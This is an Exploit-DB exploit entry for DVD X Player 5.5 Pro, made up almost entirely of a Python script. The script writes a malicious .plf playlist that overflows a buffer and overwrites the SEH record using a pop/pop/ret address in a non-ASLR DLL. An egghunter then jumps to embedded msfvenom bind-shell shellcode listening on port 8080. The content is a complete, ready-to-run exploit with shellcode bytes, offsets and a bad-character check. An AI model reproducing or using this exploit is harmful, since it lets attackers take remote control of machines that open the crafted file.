DVD X Player 5.5 Pro – Overwrite (SEH)

  • 作者: blake
    日期: 2011-09-06
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/17788/
  • # DVD X Player 5.5 Pro
    # Bypass ASLR by using non-aslr enabled module
    # SEH Overwrite
    # Egghunter is not strictly needed (at least 2000 bytes are available for shellcode after the SEH record);
    # one is included below anyway, with the egg and shellcode placed right behind it in the same buffer.
    
    
    import sys
    
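    # All payload pieces are bytes literals (b"...") so the file holds exactly these
    # bytes on Python 2 and Python 3 alike.  A text-mode str on Python 3 is UTF-8
    # encoded on write, so every byte >= 0x80 would become two bytes and the
    # nSEH/SEH offsets below would no longer line up.
    #
    # Bad characters the whole buffer must avoid (the .plf is parsed as text by the
    # player): NUL, LF, CR and Ctrl-Z (EOF).  The msfvenom run below excluded them
    # from the shellcode; build_payload() re-checks every part, including the
    # nSEH jump, the pop/pop/ret address and the egghunter.
    BAD_CHARS = (b"\x00", b"\x0a", b"\x0d", b"\x1a")

    # size = 325 bytes
    # ./msfvenom -p windows/shell/bind_tcp LPORT=8080 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x1a' -f c
    # NOTE: shikata_ga_nai is polymorphic; re-running msfvenom gives different bytes
    # (and a different length), so the size comment and the layout must be re-verified.
    shellcode = (
        b"\xba\x16\x44\x8a\xd1\xdb\xd1\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
        b"\x4b\x31\x55\x14\x83\xc5\x04\x03\x55\x10\xf4\xb1\x76\x39\x71"
        b"\x39\x87\xba\xe1\xb3\x62\x8b\x33\xa7\xe7\xbe\x83\xa3\xaa\x32"
        b"\x68\xe1\x5e\xc0\x1c\x2e\x50\x61\xaa\x08\x5f\x72\x1b\x95\x33"
        b"\xb0\x3a\x69\x4e\xe5\x9c\x50\x81\xf8\xdd\x95\xfc\xf3\x8f\x4e"
        b"\x8a\xa6\x3f\xfa\xce\x7a\x3e\x2c\x45\xc2\x38\x49\x9a\xb7\xf2"
        b"\x50\xcb\x68\x89\x1b\xf3\x03\xd5\xbb\x02\xc7\x06\x87\x4d\x6c"
        b"\xfc\x73\x4c\xa4\xcd\x7c\x7e\x88\x81\x42\x4e\x05\xd8\x83\x69"
        b"\xf6\xaf\xff\x89\x8b\xb7\x3b\xf3\x57\x32\xde\x53\x13\xe4\x3a"
        b"\x65\xf0\x72\xc8\x69\xbd\xf1\x96\x6d\x40\xd6\xac\x8a\xc9\xd9"
        b"\x62\x1b\x89\xfd\xa6\x47\x49\x9c\xff\x2d\x3c\xa1\xe0\x8a\xe1"
        b"\x07\x6a\x38\xf5\x31\x31\x55\x3a\x0f\xca\xa5\x54\x18\xb9\x97"
        b"\xfb\xb2\x55\x94\x74\x1c\xa1\xdb\xae\xd8\x3d\x22\x51\x18\x17"
        b"\xe1\x05\x48\x0f\xc0\x25\x03\xcf\xed\xf3\x83\x9f\x41\xac\x63"
        b"\x70\x22\x1c\x0b\x9a\xad\x43\x2b\xa5\x67\xec\x9a\x81\xdb\x7b"
        b"\xde\x35\xc3\xeb\x57\xd3\x91\x1b\x31\x4b\x0e\xde\x66\x44\xa9"
        b"\x21\x4d\xf8\x62\xb6\xda\x16\xb4\xb9\xdb\x3c\x96\x16\x74\xd7"
        b"\x6d\x75\x41\xc6\x71\x50\xe2\x9f\xe6\x2e\x62\xed\x97\x2f\xaf"
        b"\x87\x57\xba\x4b\x0e\x0f\x52\x51\x77\x67\xfd\xaa\x52\xf3\x34"
        b"\x3e\x1d\x6c\x39\xae\x9d\x6c\x6f\xa4\x9d\x04\xd7\x9c\xcd\x31"
        b"\x18\x09\x62\xea\x8d\xb1\xd3\x5e\x05\xd9\xd9\xb9\x61\x46\x21"
        b"\xec\x73\xbb\xf4\xc9\xf1\xcd\x72\x3a\x3a"
    )

    # 32 byte egghunter (NtAccessCheckAndAuditAlarm-style, scans for the egg
    # repeated twice and jumps to whatever follows it)
    egghunter = (
        b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8"
        b"\x54\x30\x30\x57"  # egg - W00T (bytes "T00W" in memory, dword 0x57303054)
        b"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
    )

    # Layout, per the author's notes:
    #   overwrite EIP = 260 bytes (a plain return-address overwrite is also possible)
    #   overwrite SEH = 616 bytes - 0x61602adb pop edi; pop esi; ret [EPG.dll]
    #       nSEH sits at offset 608, the SEH handler at offset 612.
    #       EPG.dll is used because it is loaded without ASLR (see header comment);
    #       the address is only valid for this exact DLL build.
    egg = b"\x54\x30\x30\x57\x54\x30\x30\x57"  # egg repeated twice, as the hunter expects
    buffer = b"\x41" * 608  # filler up to nSEH (name kept from the original script)
    next_seh = b"\xeb\x06\x90\x90"  # jump forward 6 bytes, over the SEH handler slot
    seh = b"\xdb\x2a\x60\x61"  # pop/pop/ret, little-endian 0x61602adb
    nops = b"\x90" * 20

    try:
        _prompt = raw_input  # Python 2
    except NameError:  # Python 3: raw_input() became input()
        _prompt = input


    def build_payload(stage=shellcode):
        """Return the complete .plf contents as bytes.

        Layout: 608 filler | nSEH (4) | SEH (4) | 20 NOPs | egghunter (32) |
        20 NOPs | egg (8) | *stage* shellcode.  With the stock stage the result
        is 1021 bytes.

        Args:
            stage: shellcode to append after the egg; defaults to the embedded
                bind-shell stage so existing callers are unaffected.

        Raises:
            ValueError: if any byte in BAD_CHARS appears anywhere in the buffer
                (e.g. after swapping in freshly generated shellcode).
        """
        payload = buffer + next_seh + seh + nops + egghunter + nops + egg + stage
        # The bad-char restriction applies to the whole file, not just the
        # shellcode: a stray LF/CR/NUL in any component truncates or mangles
        # the buffer before it reaches the vulnerable copy.
        found = [c for c in BAD_CHARS if c in payload]
        if found:
            raise ValueError("payload contains bad character(s): %r" % (found,))
        return payload


    def main(path="owned.plf"):
        """Write the crafted .plf to *path*; exit with status 1 if that fails."""
        print("====================================")
        print("DVD X Player 5.5 Pro Buffer Overflow")
        print("SEH Overwrite - Bypass ASLR ")
        print(" Written by Blake ")
        print("====================================")

        print("[+] Creating malicious plf")
        try:
            # "wb": no newline translation, no text encoding -> bytes land as-is.
            with open(path, "wb") as fh:
                fh.write(build_payload())
        except (IOError, OSError) as exc:
            # Narrow except: a bare `except:` also swallowed Ctrl-C at the
            # prompt and reported it as a file error, and exiting 0 on failure
            # hid the problem from any wrapper script.
            print("[X] Error creating file! %s" % exc)
            sys.exit(1)
        print("[+] File created successfully")
        _prompt("[+] Press any key to exit")


    if __name__ == "__main__":
        main()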